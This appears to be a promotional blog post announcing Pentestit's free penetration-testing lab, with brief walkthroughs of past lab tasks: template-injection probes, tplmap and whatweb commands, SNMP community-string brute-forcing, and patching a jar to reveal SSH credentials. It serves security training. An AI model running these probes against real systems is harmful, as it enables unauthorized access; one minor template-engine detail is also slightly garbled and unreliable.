Free Penetration Testing Laboratory Test Lab 15 — Who Is the n0v1ch0k?

Published in

Geek Culture

5 min readMar 3, 2021

On March 15, 2021, Pentestit launches Test lab 15, where IT specialists can test their skills in finding and exploiting vulnerabilities in the corporate network and web applications for free.

About Test lab

Test lab is a cyber training ground where participants gain experience in analyzing the security of information systems. Each such laboratory has an integral infrastructure, history and many hidden vulnerabilities that must be discovered, localized and exploited, and as a result — a full-fledged scenario for compromising the company’s network. An important feature of the Test lab is maximum realism. Participants acting as attackers, as they pass, gain access to individual nodes of the laboratory, each of which contains a token. The winner is the one who first collects all tokens and takes full control of the virtual corporate network. Anyone can try their hand and check their existing information security skills. Laboratories are always unique and contain the most relevant vulnerabilities.

What you need to test your skills and capabilities:

Register in your personal account on the website lab.pentestit.ru, where information for connecting to the laboratory (login / password) will be available.
Connect to the lab via OpenVPN.
Establish a connection and gain access to the gateways behind which the test company network is located.
Start developing an attack.

What is the essence of passing tasks

The main purpose of the laboratory is to acquire and consolidate the skills of searching and exploiting vulnerabilities both in manual mode and using special tools such as: Nmap, Tplmap, Dirbuster, Wapiti, BurpSuite / OWASP Zap, Metasploit Framework, Patator / Hydra, Enum4linux, IDE as well as tools for reverse engineering, network protocol analysis, etc.

By receiving tokens, you will be able to penetrate deeper into the test corporate network, where more and more servers will be available for attack. In the course of work, you will get acquainted with popular technologies, this will allow you to look at information security from the side of an attacker. It is worth remembering about your main tool — logical thinking and resourcefulness.

For an illustrative example, we propose to analyze several tasks of the past laboratories. The full walkthrough of Test lab 14 tasks is available at the link.
All information is presented for informational purposes only, do not violate the law.

Wiki

There is a search bar on the site page, where we enter the text and make sure that it is displayed on the page:

Assuming that a template engine is used, enter the data to define it:

{{7*7}}

The entered text is displayed on the page without changes, therefore, this is not Jinga or Twig. To save time, let’s use the Tplmap tool, which could not figure out which plugin is being used:

# ./tplmap.py -u http://127.0.0.1/?a=

With the help of WhatWeb, we found out that the site is written in Ruby-on-Rails: # whatweb 127.0.0.1

Let’s try to use the payload for the popular Ruby-on-Rails Haml templating engine: <%=7*7>

The page displayed 49, therefore, the plugin was found correctly. Then we compose a request that allows us to get a token:токен

Router

Having performed reconnaissance in the form of scanning TCP ports, no results were obtained. Trying to scan UDP. Found an open SNMP port (UDP 161). And using the Onesixtyone tool, we have community lines:

# onesixtyone -c /usr/share/john/password.lst 172.16.50.50

When we have the necessary data, using the Snmpwalk tool, we try to get information about the server:

# snmpwalk -c skywalker -v1 172.16.50.50

After analyzing the command output, we notice a strange system name, probably a token.

Java

Open the jar file as an archive and see that it consists of one class Main. Go to Main.class in the IDE:

After examining the decompiled code, we find information for connecting to SSH and displaying the result of the command:

df -h | grep /dev/sda1

Please note that the password is being changed. Add a few lines to the class to display the server IP address, login and password with which the connection is made.

Editing the class:

Compile the modified class and replace the original class in the jar file with it. Run the file:

The displayed password is a token.

Test lab statistics

More than 33,000 users from all over the world have already registered on the laboratory website. At the same time, a total of 664 participants completed the first task from the previous laboratory. At the same time, only 69 of them were able to compromise the IT structure of the virtual company completely.

About us

In addition to creating unique laboratories, we are the developers of Nemesida WAF, and also provide analysis services for the presence shortcomings (vulnerabilities) of corporate networks and web applications for the largest companies from Russia, USA, Great Britain, Czech Republic, Ukraine, Moldova, Azerbaijan, Kazakhstan, Canada; we train employees of large companies in the field of information security. If you want to understand in more detail how it all works, we offer training in the programs Zero Security: A (basic training) or Corporate laboratories (advanced training).

Conclusion

In the process of working in the Test lab, participants will study the nature of vulnerabilities, the main exploitation tools, countermeasures and the psychology of the attacker. By understanding how to build real attack vectors, you will learn how to effectively counter them. See you in the new Test lab 15!